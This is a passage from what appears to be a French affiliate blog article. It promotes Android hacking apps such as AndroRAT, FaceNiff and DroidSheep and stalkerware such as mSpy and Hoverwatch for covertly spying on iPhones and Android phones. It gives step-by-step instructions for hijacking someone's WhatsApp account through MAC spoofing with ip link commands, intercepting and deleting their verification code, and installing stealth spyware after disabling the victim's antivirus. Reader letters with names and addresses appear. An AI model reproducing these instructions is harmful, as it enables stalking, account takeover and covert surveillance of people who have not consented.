  • 11. Scanner en utilisant les protocoles TCP ou UDP
  • 12. Détection des CVE à l’aide de Nmap
  • 13. Lancement du DOS avec Nmap
  • 14. Lancer des attaques par force brute
  • 15. Détection d’infections par des logiciels malveillants sur des hôtes distants
Téléchargement de Nmap

Shark for Root

L’application Shark for Root ne fonctionne qu’avec des téléphones Android rootés, elle est basée sur le tcpdump. C’est un outil en lignes de commande et sa principale fonction est d’analyser le trafic envoyé sur un réseau. L’appli peut lire et intercepter les paquets de données que les différents appareils envoient et reçoivent. L’application shark tool doit être utilisée dans les cas où, pour des raisons de sécurité, vous devez intercepter les données transférées sur un réseau, après avoir averti les utilisateurs. Dans le cas contraire, cela est considéré comme une violation de la vie privée de l’utilisateur. Elle peut être utilisée pour voler les identifiants de connexion et les mots de passe de différents services comme Facebook et les fournisseurs de messagerie électronique. Shark for Root est une version Android de Wireshark qui s’adresse aux experts en sécurité et aux pirates informatiques. Il s’agit d’un renifleur de trafic qui fonctionne en mode Wi-Fi, 3G et à partir d’une connexion filaire.

Prérequis

› Le système d’exploitation minimum requis est Android 1.6, Pie, Marshmallow et Nougat. › L’installation de l’application au moyen du fichier APK nécessite l’activation des “sources inconnues”, option à cocher dans Paramètres > Applications.
Téléchargement de l’application de sécurité avancée Shark For Root

Droidsheep

DroidSheep est une application Android open-source réalisée par Corsin Camichel qui permet d’intercepter des sessions de navigation non protégées en utilisant le WiFi. DroidSheep APK est un logiciel développé uniquement pour tester les vulnérabilités de sécurité et il n’est pas fait pour nuire à quiconque. Il fonctionne sur la plateforme Android et pour utiliser DroidSheep, vous devrez avoir votre appareil rooté. DroidSheep est fourni sous forme de fichier APK, mais si vous voulez le code source, vous pouvez l’obtenir à partir de l’enregistrement Github de l’auteur original. Lorsque les utilisateurs interagissent par le biais du WiFi, d’autres parties situées dans la zone de transmission peuvent également écouter secrètement l’événement. DroidSheep fonctionne en lisant tous les paquets entre l’expéditeur et le destinataire. C’est l’idéal pour vérifier toute faille de sécurité. La seule solution pour éviter cela est d’utiliser le HTTPS. Si vous avez déjà un certificat SSL mis en place sur votre site web, vous n’avez donc pas besoin d’utiliser DroidSheep pour vérifier les vulnérabilités car vous êtes déjà crypté et protégé. Téléchargement de l’application Droidsheep

zANTI

zANTI est une boîte à outils de test de pénétration développée par Zimperium Mobile Security pour les professionnels de la cybersécurité et les hackers. Grossièrement, elle permet de simuler des attaques malveillantes sur un réseau. Avec l’aide de zANTI, vous pourrez effectuer différents types d’opérations telles que des attaques MITM, l’usurpation d’adresse MAC, le scan, l’audit de mots de passe, les vérifications de vulnérabilité et bien plus encore. Cette boîte à outils Android est le compagnon idéal des pirates informatiques et hackers.
  • Changer l’adresse MAC de l’appareil.
  • Créer un hotspot WiFi malveillant.
  • Détourner des sessions HTTP.
  • Capturer des téléchargements.
  • Modifier les requêtes et les réponses HTTP.
  • Exploiter des routeurs.
  • Auditer les mots de passe.
  • Vérifier la vulnérabilité d’un périphérique aux chocs de shell et SSL.
Téléchargement de l’application zANTI

FaceNiff

FaceNiff est une application Android qui vous permet de renifler et d’intercepter les profils de session web sur le WiFi auquel votre mobile est connecté. Il permet de détourner des sessions lorsque le WiFi n’utilise pas l’EAP. Il doit aussi fonctionner sur n’importe quel réseau privé (Open/WEP/WPA-PSK/WPA2-PSK). Facile à utiliser, il fonctionne sur WPA2. Attention : il faut un téléphone rooté. Si l’utilisateur utilise SSL, cette application ne fonctionnera pas. Téléchargement de FaceNiff ici

AndroRAT

Hacker Android : Habituellement, tout appareil Android peut être piraté en utilisant l’attaque Metasploit Meterpreter mais beaucoup de gens ne savent pas se servir de ce processus qui n’est pas très convivial. En utilisant un outil simple appelé AndroRAT (Android Remote Administration Tool), il est possible pour n’importe qui de pirater n’importe quel appareil Android. En exécutant cet outil avec succès, on peut récupérer les informations suivantes sur l’appareil Android cible:
  • Obtenir des contacts (et toutes leurs informations)
  • Faire vibrer le téléphone
  • Obtenir les journaux d’appels
  • Ouvrir une URL dans le navigateur par défaut
  • Recevoir tous les messages
  • Envoyer un SMS
  • Le localiser par GPS/réseau
  • Suivre en direct les messages reçus
  • Lire les vidéos en continu
  • Surveiller l’état du téléphone en direct (appel reçu, appel envoyé, appel manqué…)
  • Diffusion du son du microphone (ou d’autres sources)
  • Prendre une photo de l’appareil photo
Téléchargement de l’application de piratage AndroRAT

Hackode

Hackode est une application Android développée par Ravi Kumar pour les testeurs d’intrusion, les pirates éthiques, les administrateurs informatiques et les professionnels de la cybersécurité. Vous pouvez utiliser cette application pour recueillir des informations sur une cible et pour trouver des sites vulnérables. Cette application est un excellent complément à l’arsenal d’un utilisateur Android soucieux de la sécurité. Remarque : vous devez disposer d’une connexion internet en état de marche. Lorsque vous ouvrez l’application, vous verrez 4 options : Reconnaissance, Scanning, Exploits et Security Feed.

Les outils proposés par l’application de hacking Hackode :

  • Reconnaissance : Outils de collecte d’informations.
  • Google Hacking – Ce module contient des outils (Google Dorks) que vous pouvez utiliser pour trouver les sites vulnérables.
  • PhpMyAdmin – Ce Google Dork contourne le nom d’utilisateur et le mot de passe de l’administrateur et vous amène directement aux tableaux d’information des sites web vulnérables.
  • PhpConfig – Celui-ci vous montre un résultat de recherche Google contenant les sites vulnérables qui peuvent vous permettre d’inclure des fichiers malveillants dans une application web.
  • SQL Injection – Ce dork Google affiche les sites vulnérables aux attaques par injection SQL.
  • Recherche WhoIs : Cet outil vous permet de rechercher des informations sur les noms de domaine et les adresses IP.
  • Balayage : Outil permettant de scanner la cible.
  • Ping : Permet de tester l’accessibilité d’un hôte et de mesurer le temps de trajet aller-retour des messages envoyés à partir de l’hôte vers un appareil de destination.
  • Traceroute – Vous permet d’identifier les dispositifs intermédiaires et la vitesse de connexion.
  • DNS Dig – Permet de trouver des informations sur le serveur DNS du site web cible.
Download de Hackode

Note

Si vous n’êtes pas un hacker et que vous voulez simplement savoir quels sont les messages et les appels qui arrivent dans un téléphone ciblé, en plus de le localiser, il vous suffit simplement d’installer cette application qui sait se rendre invisible dans le smartphone et qui vous rapatriera toutes les données utiles sur votre compte à consulter en ligne.

Logiciel espion pour iPhone : Comparatif 2020

Si vous avez un iPhone, les programmes de suivi et d’espionnage que nous allons vous présenter vous permettront de le suivre à distance sans y avoir accès. La sécurité des renseignements personnels est une priorité absolue. Notez que l’iPhone ciblé doit être jailbreaké pour que la plupart de ces applications soient installées (sauf Mspy qui possède une version sans jailbreak). Si vous ne souhaitez pas jailbreaker l’iPhone ciblé, je présente également 2 solutions : la duplication d’iCloud et la clé de récupération de Paraben Consumer.

La procédure d’espionnage à l’aide de l’identifiant Apple

Il est possible d’espionner un iPhone sans avoir à effectuer au préalable le processus de jailbreak. Cette techniqe utilise les données iCloud de l’iPhone surveillé. Il faut d’abord obtenir l’iCloud ou l’Apple ID de l’iPhone pour l’espionner. Il arrive que cet iPhone n’ait pas activé la sauvegarde iCloud dans ses paramètres. Dans ce cas, il faut accéder physiquement à l’iPhone pour activer cette sauvegarde.
  • Allez dans les paramètres de l’appareil iOS à espionner
  • Connectez-vous à iCloud en utilisant l’Apple ID et le mot de passe.
L’Apple ID vous donne la possibilité de synchroniser des courriels, des messages, des lieux, des photos, des contacts, etc. Par exemple, si vous voulez espionner des messages, vous devez aller dans les “paramètres”, “messages”, puis activer “iMessage”. L’activation d’iMessage vous demandera de saisir le mot de passe et l’Apple ID de l’appareil ciblé. Ensuite, vous pouvez vous connecter à iCloud depuis votre PC (ou téléphone) et attendre que l’appareil se connecte. Vous espionnerez ce que vous avez choisi de surveiller, qu’il s’agisse de messages, de lieux, de photos ou de courriels. Ce processus d’espionnage iCloud ne nécessite pas de jailbreak. Il vous permet de surveiller les activités iOS de l’iPhone de manière invisible. Vous pourrez également transférer sur votre appareil toutes les informations que vous voulez, y compris les applications. Malheureusement iCloud ne délivre pas toutes les informations d’un téléphone, par exemple les discussions faites sur les messageries ou les applications tierces comme Tinder ne vous seront pas dévoilées. Pour cela, il faut installer un logiciel espion dédié à l’espionnage sur iPhone.

5 applications adaptées à l’espionnage de l’iPhone, même l’iPhone X

Hoverwatch

Hoverwatch est un outil d’espionnage pour iPhone et téléphone Android. En plus des journaux d’appels, des SMS et iMessages, des emplacements, de l’historique du navigateur, des signets, des messages WhatsApp, des contacts, des applications, des photos, des vidéos, des activités du calendrier, des rappels et des mémos vocaux, Hoverwatch s’est spécialisé dans l’écoute des voix et des converssations.
  • Il peut écouter les appels téléphoniques en direct
  • Il peut les faire enregistrer automatiquement pour les écouter plus tard
  • Il peut déclencer le microphone du téléphone à volonté pour écouter l’entourage du smartphone
Hoverwatch installation
La démo officielle de Hoverwatch → Prix : 8,33 €/mois

mSpy

Ce logiciel de suivi d’appareils téléphoniques peut être utilisé sur tous les smartphones et tablettes. Son avantage, c’est qu’il est simple à utiliser, très efficace tant qu’on ne veut pas écouter les appels, et qu’il est en plus installable sur des iPhones non jailbreakés. Une fois que l’application est installée, elle commence à enregistrer les activités sur l’appareil ciblé et télécharge les données collectées sur votre compte en ligne à des fins de surveillance et de contrôle. Vous pouvez utiliser cette application sans qu’elle soit jailbreakée étant donné que vous avez un AppleID valide et qu’iCloud est activé sur l’iPhone X. Bien qu’il s’agisse de bonnes nouvelles, Mspy est doté de fonctions plus limitées que Hoverwatch car si vous pourrez suivre les journaux d’appels, les SMS, les contacts, l’historique du navigateur, les localisations et les tchats, il vous sera impossible d’enregistrer la voix et d’écouter les appels. A noter : si l’iPhone X est jailbreaké, Mspy vous permettra en plus de lire toutes les discussions faites sur les réseaux sociaux, y compris Snapchat, Facebook Messenger et autres sites de rencontres comme Tinder.

Les + :

  • Peut être utilisé sur un iPhone sans jailbreak
  • Très fiable
  • De très bonnes fonctionnalités et une excellente interface.

Les – :

Des fonctionnalités limitées si utilisées sur un iPhone sans jailbreak.
Mspy écran d’accueil
L’offre Mspy réservée pour Untelephone.com → Prix : Version premium à partir de 14,16 € par mois pour un engagement d’un an.

Family Locator

Family Locator est spécialement dédiée aux enfants avec lesquels vous désirez rester constamment en contact. Family Locator se définit elle-même comme une application de suivi pour les familles, la sécurité des enfants et les alertes en cas d’urgence. Ses buts sont les suivants :
  • – Voir où se trouvent les membres de la famille en temps réel
  • – Partager gratuitement des messages familiaux multiplateformes
  • – Savoir quand les enfants quittent l’école
  • – Recevoir une alerte s’ils vont là où ce n’est pas sûr
  • – Envoyer/recevoir un SOS avec l’emplacement exact
  • – Les retrouver en réalité augmentée
  • – Geo-clôture : savoir quand ils dépassent une limite géographique précisée
  • – Etre averti s’ils quittent l’endroit choisi
  • – Dire aux autres membres de votre famille où vous êtes
  • – Révéler l’emplacement des personnes en qui vous avez confiance

Les + :

  • La consommation de la batterie de l’Iphone X a été optimisée pour une utilisation quotidienne. Family Locator doit vérifier votre position régulièrement, mais ne consomme pas plus de 4% de la durée de vie de votre batterie.
  • Il existe un mode “Invisible” pour les parents et les administrateurs
  • Seul un parent ou un administrateur peut gérer les membres de sa famille et définir quelles zones sont sûres ou dangereuses.

Les – :

  • L’application se contente de géolocaliser mais n’enregistre pas les messages texte, les réseaux sociaux ni les Emails.
  • Pour que le localisateur de famille fonctionne correctement, les services de localisation doivent être activés.
Family Locator Ecran
Site officiel Family Locator → Prix : 4,99 €

Phone Tracker

Si vous n’avez besoin de suivre qu’un seul téléphone, essayez cette application à la place de la précédente – elle peut être utilisée sur deux iPhones gratuitement. Tant que cette app est installée dans un iPhone, il n’est pas nécessaire de lancer l’application pour qu’elle fonctionne. Elle est capable de localiser l’emplacement de l’autre personne au cours des dernières 24 heures ; vous serez en mesure de programmer l’application pour cartographier les emplacements toutes les deux à soixante minutes (→ voir d’autres outils de localisation dans notre article dédié à la localisation d’un iPhone).

Les + :

L’iPhone n’a pas besoin d’être jailbreaké.

Les – :

L’intervalle entre chaque déplacement est élevé, et l’appli épuise l’autonomie de la batterie.
Phone Tracker gratuit
Phone Tracker pour iPhone → Prix : Gratuit

SpyVid

Vous cherchez une application qui vous permettra d’enregistrer des vidéos sans que personne ne s’en aperçoive ? En lançant cette application, vous pourrez enregistrer une vidéo d’une durée maximale d’une heure tout en faisant semblant d’utiliser votre téléphone pour autre chose. L’écran fait semblant de vous amener sur Twitter, mais en réalité vous êtes en train de prendre une vidéo. Vous pouvez adapter le contraste de votre objectif pour que la cible apparaisse sur votre écran ou pour qu’elle soit totalement invisible, à votre convenance. → Voir aussi 5 autres alternatives dans notre article “Prendre une photo discrètement sans être vu“.

Les + :

Pas de jailbreaking requis, excellent enregistrement même en basse luminosité.

Les – :

Impossible d’enregistrer les vidéos dans votre galerie. N’a pas été mis à jour depuis longtemps, est-il toujours supporté par les nouveaux iPhones ?
SpyVid
SpyVid → Prix : 1,99 €

Comment pirater un iPhone avec un Keylogger

Une autre façon de pirater un iPhone consiste à le faire via Global Gsm Control, un logiciel enregistreur de frappes au clavier. Ce genre d’applications permet de pirater un iPhone à partir d’un autre iPhone. Vous devez d’abord configurer Global Gsm Control sur l’appareil cible. L’appareil cible doit être jailbreaké. Vous ne pourrez pas configurer ce soft à distance. Vous devrez accéder physiquement au dispositif cible pendant une courte période. S’il n’est pas jailbreaké, vous devrez le jailbreaké. Notez que cela annule la garantie de l’appareil et le rend vulnérable aux logiciels malveillants. Comment pirater l’iPhone de quelqu’un depuis votre téléphone avec Global Gsm Control ? Voici les étapes à suivre :
  • Étape 1 : Rendez-vous sur le site officiel.
  • Étape 2 : Souscrivez à un plan mensuel. Les prix sont très élevés.
  • Étape 3 : Téléchargez l’application et suivez les instructions d’installation.
Une fois le keylogger  installé, vous pourrez surveiller l’iPhone à distance depuis n’importe quel autre appareil ayant accès à internet, y compris votre smartphone. Voici quelques-unes des fonctionnalités proposées :
  • Capture d’écran
  • Historique des visites du site web
  • WhatsApp
  • Presse-papiers
  • Localisation par GPS
L’application offre une gamme de fonctionnalités compétitives, mais elle est beaucoup plus chère que les autres applications d’espionnage du marché.

La technique matérielle avec l’iPhone Data Recovery Stick

Site officiel Le iPhone Recovery Stick récupère les données supprimées des appareils iPhone et iPad. Conçu et soutenu par Paraben Consumer, un leader mondial de la récupération de données médico-légales, il prend la forme d’une clé de récupération iPhone. Le processus de récupération s’exécute entièrement à partir de la clé sans qu’aucune installation de logiciel ne soit nécessaire. Les données récupérées sont enregistrées directement sur la clé et ne laissent aucun indice sur l’ordinateur hôte.
iRecovery Stick
  • Compatible avec tous les modèles d’iPhone et d’iPad
  • Compatible avec toutes les versions d’iOS, y compris iOS 13
  • Récupère les messages supprimés, y compris les SMS, Facebook, KiK et autres
  • Récupère l’historique des appels, les contacts, l’historique internet, le calendrier, les photos, les photos cachées, les mémos vocaux et les comptes de messagerie électronique
  • Ne laisse aucune trace de récupération sur le téléphone ou l’ordinateur
  • Découvre les photos cachées dans les applications de dissimulation de photos, comme “Calculator”
  • Récupére des données à partir d’un nombre illimité d’appareils
  • Les données supprimées sont récupérables jusqu’à ce qu’elles soient écrasées par de nouvelles données.
Contrairement aux téléchargements de récupération de données, le logiciel de récupération s’exécute directement à partir du stick, ne laissant aucune trace.

Comment récupérer des données avec la clé de récupération iRecovery Stick ?

  • Branchez votre iPhone ou votre iPad sur un PC Windows
  • Branchez le iPhone Recovery Stick sur le même PC
  • Cliquez sur “Démarrer” pour commencer votre récupération
  • Vos données récupérées seront enregistrées directement sur la clé

Qu’est-ce qui rend l’iPhone Stick unique ?

  • Le iPhone Recovery Stick est discret. Le processus de récupération s’effectue entièrement à partir de la clé, sans qu’il soit nécessaire de l’installer sur l’ordinateur hôte.
  • Il permet de récupérer des données supprimées – textes, journaux d’appels, contacts, historique du site, photos, etc.
  • Il récupère les photos cachées de plus de 30 applications populaires de dissimulation de photos.
  • Il récupère les fichiers de sauvegarde d’iTunes si l’appareil n’est pas physiquement présent.
  • Fabriquée et soutenue par une entreprise ayant plus de 18 ans d’expérience dans le développement de produits de criminalistique numérique, cette clé est utilisée par les forces de l’ordre et les enquêteurs médico-légaux du monde entier.

Liste des données récupérées

Messages (SMS, Facebook, etc.) Historique des appels Contacts
Historiques internet Calendrier/rappels de rendez-vous Photos
Photos cachées Mémos vocaux Comptes de courrier électronique
Historique des cartes gps Liste des applications installées Twitter
Google Chrome Boîte vocale Messagerie Facebook
Gmail Google Earth & Maps KiK, Whisper, Evernote
Texte, TextPlus, Mail.ru Vkontakte Skype, LinkedIn

Les données textuelles dynamiques

Les textes dynamiques sont des mots que l’iPhone apprend grâce à ce qui est tapé à plusieurs reprises au clavier. L’iPhone les enregistre pour les proposer automatiquement la prochaine fois. Des éléments tels que le nom d’une personne ou le nom d’un restaurant sont facilement identifiables et permettent d’attraper un malfaiteur.

Les propriétés du téléphone

L’iPhone possède de nombreuses propriétés uniques telles que le numéro de modèle, le numéro de série, le numéro de téléphone et la version iOS. Si jamais une enquête doit être diligentée devant un tribunal, ces informations sont essentielles.

Récupérer les fichiers de sauvegarde iTunes

Le iPhone Recovery Stick permet de récupérer des données supprimées même sans le téléphone. Chargez les fichiers de sauvegarde d’iTunes dans Windows et la clé récupérera les mêmes types de données que celles qu’elle récupère sur le téléphone lui-même.

Configuration requise pour utiliser l’iRecovery Stick

  • Apple iPhone, iPad, iTouch (ou tout autre fichier de sauvegarde iTunes)
  • Câble USB pour iPhone/iPad
  • Ordinateur Windows
  • Code PIN de l’iPhone
  • Temps de récupération : entre 15 min et 2 heures

Laquelle des applications espions est la plus populaire sur iPhone?

Mspy est le plus populaire de tous les logiciels espions dédiés aux iPhones, pour les raisons suivantes :
  • – Cette application surveille plus de messageries instantanées que n’importe quelle autre application de surveillance IOS
  • – Elle capture les autocollants et les images que les autres logiciels espions pour iPhone ont du mal à capturer.
  • – Elle permet des alertes par mot-clé et des alertes de localisation
  • – Nombre illimité de changements d’appareils pendant l’abonnement
  • – Comprend un navigateur GPS spécial en plus du relevé des bornes Wi-Fi
  • – Est capable de fonctionner 100% invisible ou visible, au choix
  • – Vous fait consulter l’historique Web, les signets et l’utilisation de l’application
  • – Est moins cher que la concurrence
Voir ici son test sur notre blog

Comment fonctionne-t-elle sur un iPhone X?

  • Etape 1 : Acheter l’application espion sur son site
  • Etape 2 : Installer cette application de monitoring IOS sur l’iPhone X ciblé
  • Etape 3 : Commencer à espionner l’iPhone X via un simple compte

Vos questions sur l’espionnage des iPhones

“Bonjour, je me demande s’il existe un logiciel que je pourrais secrètement mettre sur l’iPhone X de ma fille qui me permettra de voir ce qu’elle fait sur son smartphone. Je l’ai attrapée avec de la drogue et je ne badine pas avec ça. Je veux la laisser s’accrocher à son iPhone X pour voir ce qu’elle manigance et tout révéler au grand jour. Je déteste qu’on me mente et j’ai bien l’intention de découvrir la vérité. Après avoir cherché en ligne, j’ai vu certaines applications comme “Keylogger IOS” ou “Spy IOS”, mais je ne suis pas sûr qu’ils puissent être utilisés sur iPhone X… Faîtes-moi savoir où je peux trouver un bon spyware pour iPhone X, merci.Marsilius Audet, 84 boulevard Aristide Briand, 76120 LE GRAND-QUEVILLY
“J’ai une entreprise et j’ai besoin de garder la trace de mes camions même à distance. J’ai besoin de cette fonction de géolocalisation de manière à afficher leur emplacement et mettre à jour leurs déplacements, ce qui faciliterait le suivi de mes employés. Qui peut me donner des conseils à ce sujet ? Veuillez me recommander un logiciel directement.”Mason Pomerleau, 56 Cours Marechal-Joffre, 59220 DENAIN
“Mon appareil surveillé est un iPhone X. Dois-je vraiment le jailbreaker pour pouvoir installer cette application de suivi ?”
Actuellement, l’application espion s’adapte à des périphériques jailbreakés et non jailbreakés. Si vous ne souhaitez pas jailbreaker l’iPhone X, vous pouvez acheter la version sans jailbreak, à la condition qu’iCloud soit activé dessus. Vous ne pourrez pas enregistrer les conversations des réseaux sociaux (sauf Whatsapp), mais vous pourrez lire tous les SMS du portable, connaître sa localisation, ses applications installées et ses journaux d’appels.

2 façons simples de pirater WhatsApp

Mise en garde : Ce tuto s’adresse aux parents désireux de contrôler leur enfant mais ne soutient en aucune manière le piratage illégal des données personnelles d’autrui, ce qui est puni et réprimé par la loi française.

Introduction

Beaucoup de lecteurs ayant visionné la vidéo ci-dessous nous affirment que pour eux ça ne marche pas.

Nous connaissons 2méthodes faciles pour pirater un compte Whatsapp de manière fiable en 2020. Voici comment.

2 méthodes de piratage de compte WhatsApp sans connaissance

WhatsApp est l’application de messagerie la plus utilisée dans le monde entier. Elle a une base d’usagers de plus d’1 milliard de fans. La dernière application WhatsApp Messenger bénéficie de plusieurs mises à jour comme :
  • les appels vocaux,
  • les appels vidéo,
  • les emojis
  • etc.,
Tous les utilisateurs de téléphones Android, iPhone, Microsoft, Blackberry et Nokia sont très familiers avec l’application. La dernière version de l’application inclut plusieurs fonctionnalités de sécurité comme le cryptage et la fonction d’épinglage WhatsApp. Après avoir lu ce tutoriel, vous pourrez pirater / accéder au compte WhatsApp de n’importe qui. Pendant le piratage, vous devez avoir le numéro de téléphone de la cible et l’accès physique au téléphone pour la vérification du code d’activation. Ensuite vous pourrez lire les chats, envoyer ou recevoir des messages WhatsApp. Dans tous les cas, vous pouvez pirater le compte WhatsApp sur iPhone / Android avec quelques astuces simples. Vérifions si vous pouvez accéder au téléphone cible et lire le chat de vos proches.

Méthode n ° 1: pirater le compte WhatsApp en utilisant la technique de spoofing MAC

Vous pouvez pirater un compte WhatsApp en utilisant les derniers APK de Spoofing Mac comme Busybox, Terminal Emulator etc… Pour parler simplement, il s’agit de changer l’adresse MAC du compte Whatsapp ciblé afin de lui faire croire qu’il s’agit de l’adresse MAC de votre téléphone. Le compte WhatsApp de la victime peut être sur Lollipop, Marshmallow ou même téléphone Android Nougat. Si vous choisissez cette option, vous devrez télécharger des applications qui effectueront ce “mac-spoofing” pour vous.

A propos de l’adresse MAC :

L’adresse MAC est l’adresse de contrôle d’accès du matériel. Il s’agit d’une adresse matérielle physique fournie par le fabricant de la carte réseau. Habituellement, les adresses MAC sont des nombres hexadécimaux à 12 chiffres. Ethernet, les réseaux sans fil 802.11, Bluetooth, etc., ont tous ce genre d’adresse unique. Vous pouvez la changer en utilisant certains logiciels disponibles comme Busybox APK pour Android. (Définition sur Wikipédia)

Étapes pour pirater un compte WhatsApp en utilisant la technique Mac-spoofing

Étape # 1: Tout d’abord, désinstallez votre propre Whatsapp sur votre Android / iPhone
Nous essayons de pirater le compte victime depuis votre téléphone. Comme un appareil ne peut avoir qu’un seul compte WhatsApp, vous devez désinstaller votre compte préalablement. Si vous souhaitez installer un deuxième compte sur le même téléphone, vous pouvez essayer Parallel Space APK pour Android. Si vous utilisez iPhone, essayez l’application Othman pour iPhone, alternative à Parallel. Vous pourrez ansi manipuler deux comptes Whatsapp en même temps. Assurez-vous que votre compte est correctement supprimé de votre téléphone pour faciliter le processus de piratage WhatsApp
Étape n°2: Essayez d’avoir accès au téléphone cible pendant quelques minutes
Vous devez connaître l’adresse MAC du téléphone cible sur lequel le compte WhatsApp de la victime est installé.
Étape n°3: Identifier l’adresse Mac de la cible
Si le compte WhatsApp cible est sur Android / iPhone / Blackberry ou Windows Phone, vous pouvez trouver l’adresse MAC pour pirater le compte WhatsApp en faisant:
  • Android: Paramètres> À propos du téléphone> État> Adresse MAC Wi-Fi
  • Windows Phone: Paramètres> À propos de> Plus d’infos> Adresse MAC
  • Blackberry: Options> Périphérique> Infos sur le périphérique et l’état> MAC WLAN
  • iPhone: Paramètres> Général> À propos de> Adresse Wi-fi
Étape n°4: Identifiez l’adresse MAC de votre téléphone
Paramètres de l’adresse MAC Wifi De la même manière, identifiez l’adresse MAC de votre appareil Android / iOS / Windows Phone / Blackberry et stockez-la quelque part, en toute sécurité. Vous devrez connaître votre adresse MAC une fois que vous aurez piraté le compte WhatsApp de votre cible.
Étape n°5: Installez les applications
  • Busy Box , Android Emulator (Android)
  • Mac Daddy X, WifiSpoof (iPhone)

Trouver l’adresse MAC Wifi de son téléphone

Étape n°6: Changez votre adresse MAC en celle de la victime
Une fois que vous avez installé BusyBox Apk (sur Android) ou Mac Daddy X / Wifi Spoof (sur iPhone), vous devez changer d’adresse.
  1. Ouvrez le terminal Android Emulator et tapez “ip link show” pour afficher le type d’interface sur votre téléphone.
  2. Rapidement, identifiez celle qui a l’adresse MAC, par exemple ‘eth0’.
  3. Dans le terminal, tapez “ip link set eth0 address MM:MM:MM:SS:SS:SS” où MM: MM: MM: SS: SS: SS est l’adresse de la victime. Appuyez sur “Entrée”.
  4. Dans le même terminal, tapez “ip link set eth0 broadcast MM:MM:MM:SS:SS:SS” où MM: MM: MM: SS: SS: SS est l’adresse de la victime. Appuyez sur “Entrée” pour terminer.
  5. Vous pouvez vérifier en utilisant “ip link show eth0“. La commande doit montrer l’adresse de la victime. Cette étape est nécessaire pour pirater WhatsApp.
Étape n°7: Ré-installez la dernière version de Whatsapp apk
Ré-installez WhatsApp sur votre propre téléphone après le piratage. Après l’usurpation de l’adresse, vous devez installer l’application Whatsapp mise à jour sur votre téléphone Android à partir de Google Playstore ou sur iPhone à partir de l’iTunes Store. Pendant l’installation de Whatsapp, entrez le numéro de portable de la victime. Maintenant, votre téléphone a l’adresse MAC cible, mais le code de vérification sera envoyé au numéro de téléphone sim sur le téléphone cible. Vous ne pouvez pas contourner le code de vérification WhatsApp pour pirater WhatsApp. Bien que vous puissiez activer le compte sans vérification, vous devez accéder au téléphone de la cible.
Étape n°8: Obtenir le code de vérification d’activation
Une fois que vous obtenez l’accès au téléphone cible, prenez note du code de vérification et entrez-le sur votre téléphone pour pirater le compte WhatsApp de la cible. Supprimez le message sur le téléphone de la victime après avoir réussi à pirater le compte WhatsApp.
Étape n°9: rétablissez votre adresse MAC à votre adresse d’origine
Maintenant que vous avez piraté avec succès le compte WhatsApp sur le téléphone cible, vous pouvez envoyer et recevoir des messages depuis ce compte. Vous pouvez également lire les chats WhatsApp. Remplacez l’adresse MAC de votre téléphone par l’adresse initiale que vous avez enregistrée. Voilà ! en utilisant la procédure ci-dessus, vous pouvez pirater un compte WhatsApp et lire des conversations personnelles.

Méthode n ° 2: Accéder au WhatsApp d’autrui en utilisant une application espion

La première technique d’usurpation d’identité pour pirater Whatsapp sur un téléphone cible n’a pas besoin de logiciel ni d’application installée sur le téléphone de la victime. Tout ce dont vous avez besoin, c’est le code de confirmation et de vérification du numéro de téléphone. Dans cette deuxième technique, vous devrez installer une application d’espionnage pour accéder au compte WhatsApp sans que la cible ne le sache.
L’avantage de cette deuxième technique, c’est qu’elle ne nécessite aucune connaissance technique et qu’elle est bien plus complète puisqu’en plus d’espionner Whatsapp, l’application piratera aussi les SMS, les Emails, les positions GPS et même dans certains cas les appels téléphoniques. 
Vous pouvez utiliser cette méthode furtive pour pirater Whatsapp quel que soit le modèle que votre ami utilise. Il peut s’agir d’Android Lollipop / Marshmallow / Nougat ou iPhone. Vous pouvez même pirater le compte Whatsapp sur un téléphone Windows Phone ou Black Berry.

Les applications pour Android

Plusieurs applications d’espionnage WhatsApp sont visibles sur le Store Android. Il suffit de taper “je veux voir le profil WhatsApp», ou d’autres termes de ce genre. Certaines s’appellent:
  • “Spy pour Whatsapp”,
  • “SpyPlus”
  • “Clone Whatsapp”
  • “CloneZap”
  • etc.
Mais nous vous mettons en garde contre ces applications disponibles sur les PlayStore car la plupart ne fonctionnent pas. Nous vous conseillons vraiment Mspy, ou (si vous souhaitez aussi enregistrer les conversations audio) Hoverwatch. Ces deux applications mobiles fonctionnent depuis longtemps.

Les applications pour iPhone

Des applications d’espionnage pour iPhone 5, iPhone 5S et modèles supérieurs sont disponibles sur l’iTunes Store comme par exemple iPhone App Spy, Contact Spy, Call Log Pro, etc. La plupart d’entre elles sont des applications payantes pour espionner divers aspects, à vous de choisir celle qui vous intéresse pour espionner ou pirater le compte WhatsApp de l’iPhone ciblé.
→ Mise à jour : Vous pouvez utiliser l’application premium mspy pour cette méthode, elle fonctionne sur iPhone et n’a pas besoin que l’iPhone soit jailbreaké ! La version Mspy Sans Jailbreak ne nécessite que les identifiants iCloud pour se connecter au smartphone et l’espionner à distance.
→ Mise en garde : Avant d’installer tout logiciel d’espionnage WhatsApp, lisez les commentaires et les note de l’application. Assurez-vous qu’il existe un mode furtif dans l’application. Sinon, la victime pourra facilement détecter le logiciel d’espionnage que ce soit sur Android ou iPhone. Vous ne pouvez pas espionner le compte Whatsapp ciblé sans installer d’application furtive: ne croyez pas toutes les autres méthodes de piratage à distance qui sont tout simplement des arnaques!

Mode d’emploi

  • Vérifiez si une application antivirus est installée sur le téléphone de la victime. Désactivez-le, car il ne permettra pas au programme malveillant d’être installé ni de pirater WhatsApp.
  • Après votre achat, un login et un mot de passe vous sont envoyés par Email, notez-les.
  • Téléchargez l’application sur le téléphone ciblé
  • Suivez les instructions à l’écran pour terminer le processus de piratage du compte WhatsApp
  • Activez le mode furtif, souvent disponible dans les versions Pro.
  • Laissez tombez le smartphone une fois l’application installée. A l’aide de vos login, il vous suffit de vous connecter sur votre interface en ligne pour observer tout ce qui se dit sur le téléphone.

2 méthodes alternatives : la sauvegarde Google Drive et la lecture sur le web

Lire la sauvegarde de WhatsApp à partir de Google Drive sur PC : est-ce possible ?

Bien que WhatsApp permette de faire une sauvegarde de nos chats sur Google Drive, la sauvegarde est cryptée de bout en bout. Par conséquent, même si vous accédez à une sauvegarde sur Google Drive, vous ne pourrez pas la lire sur votre PC ou sur une application tierce. La seule façon d’accéder à cette sauvegarde est d’utiliser WhatsApp sur votre propre téléphone et de restaurer vos chats sur le même compte. Cependant, si vous le souhaitez, vous pouvez accéder à l’option WhatsApp à partir des paramètres de votre Google Drive.
  • Pour ce faire, il vous suffit d’accéder à votre compte Google Drive sur votre ordinateur
  • Cliquez sur l’icône en forme de roue dentée dans le coin supérieur droit pour accéder à ses paramètres
  • Maintenant, allez dans la section “Gérer les applications” sous les paramètres Google,
